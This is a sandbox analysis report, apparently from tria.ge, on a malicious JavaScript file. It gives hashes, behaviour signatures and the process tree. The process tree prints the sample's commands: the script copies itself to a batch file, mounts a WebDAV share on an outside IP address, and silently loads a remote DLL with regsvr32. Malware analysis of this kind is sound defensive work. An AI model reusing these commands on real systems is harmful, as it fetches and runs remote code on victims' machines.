Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
08/07/2024, 04:10
Static task
static1
Behavioral task
behavioral1
Sample
1850166781191324920.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1850166781191324920.js
Resource
win10v2004-20240704-en
General
-
Target
1850166781191324920.js
-
Size
5KB
-
MD5
33301c9fd5a47289e0eff7062eb98c94
-
SHA1
b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a
-
SHA256
3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c
-
SHA512
67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0
-
SSDEEP
96:yfbvUIOO8hX7IOO8h8GoM/prtxJcqSGZTt6LWhJPNvhzALk8oOkP8o9:yPOO8SOO82m/Jtx7SGvtlSkP5
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2596 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2156 wrote to memory of 1736 2156 wscript.exe 30 PID 2156 wrote to memory of 1736 2156 wscript.exe 30 PID 2156 wrote to memory of 1736 2156 wscript.exe 30 PID 1736 wrote to memory of 2248 1736 cmd.exe 32 PID 1736 wrote to memory of 2248 1736 cmd.exe 32 PID 1736 wrote to memory of 2248 1736 cmd.exe 32 PID 1736 wrote to memory of 2596 1736 cmd.exe 33 PID 1736 wrote to memory of 2596 1736 cmd.exe 33 PID 1736 wrote to memory of 2596 1736 cmd.exe 33 PID 1736 wrote to memory of 2596 1736 cmd.exe 33 PID 1736 wrote to memory of 2596 1736 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js" "C:\Users\Admin\\fwauam.bat" && "C:\Users\Admin\\fwauam.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2248
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\895.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2596
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD533301c9fd5a47289e0eff7062eb98c94
SHA1b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a
SHA2563c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c
SHA51267141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0